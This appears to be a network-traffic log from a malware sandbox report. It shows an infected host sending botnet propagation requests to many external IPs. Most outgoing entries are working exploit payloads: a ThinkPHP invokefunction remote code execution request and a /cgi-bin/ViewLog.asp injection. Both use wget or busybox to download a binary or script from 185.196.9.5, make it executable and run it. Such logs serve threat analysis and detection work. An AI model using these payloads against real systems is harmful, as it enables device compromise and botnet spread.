Feb 25, 2024 19:03:55.877794027 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:10.981669903 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:42.469212055 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
471	192.168.2.15	57348	31.136.66.126	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.784682989 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:41.381947994 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:42.533799887 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:44.869786978 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:49.477962017 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.693763971 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.893450022 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:54.757095098 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
472	192.168.2.15	42564	94.123.190.80	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.823191881 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
473	192.168.2.15	44244	94.120.104.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.826541901 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
474	192.168.2.15	45468	94.121.54.97	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.827979088 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
475	192.168.2.15	52474	94.121.110.113	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:40.831883907 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
476	192.168.2.15	38160	112.217.181.82	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:41.037740946 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:41.327886105 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 25 Feb 2024 18:03:41 GMT Server: lighttpd/1.4.33 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
477	192.168.2.15	56162	94.120.170.15	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:41.043764114 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
478	192.168.2.15	59324	31.200.103.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:41.049158096 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
479	192.168.2.15	55050	112.74.164.168	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:41.217683077 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:41.536986113 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.16.1 Date: Sun, 25 Feb 2024 18:03:41 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
480	192.168.2.15	56706	95.101.19.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:41.722086906 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:41.991106033 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:41 GMT Date: Sun, 25 Feb 2024 18:03:41 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 38 37 35 37 62 35 63 26 23 34 36 3b 31 37 30 38 38 38 34 32 32 31 26 23 34 36 3b 33 34 64 62 30 30 35 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.98757b5c.1708884221.34db005d</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
481	192.168.2.15	41086	95.211.20.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:41.904453039 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:42.087054968 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 25 Feb 2024 18:03:42 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
482	192.168.2.15	60208	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:42.082361937 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:41Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
483	192.168.2.15	34206	95.56.73.113	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:42.173824072 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:42.443142891 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:03:42.444118023 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
484	192.168.2.15	60220	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:42.708434105 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:41Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
485	192.168.2.15	60226	62.234.184.55	23

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.333163977 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 32 36 20 30 32 3a 30 33 3a 34 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.20MAC Address: Server Time: 2024-02-26 02:03:42Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
486	192.168.2.15	35454	94.121.75.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.541245937 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
487	192.168.2.15	57214	31.200.76.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.541296959 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
488	192.168.2.15	33776	95.140.146.50	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.637202024 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:43.815500021 CET	499	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:43 GMT Server: Apache/2.4.38 (Debian) Content-Length: 305 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 74 69 6b 74 6f 6b 2d 61 64 73 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at tiktok-ads.ru Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
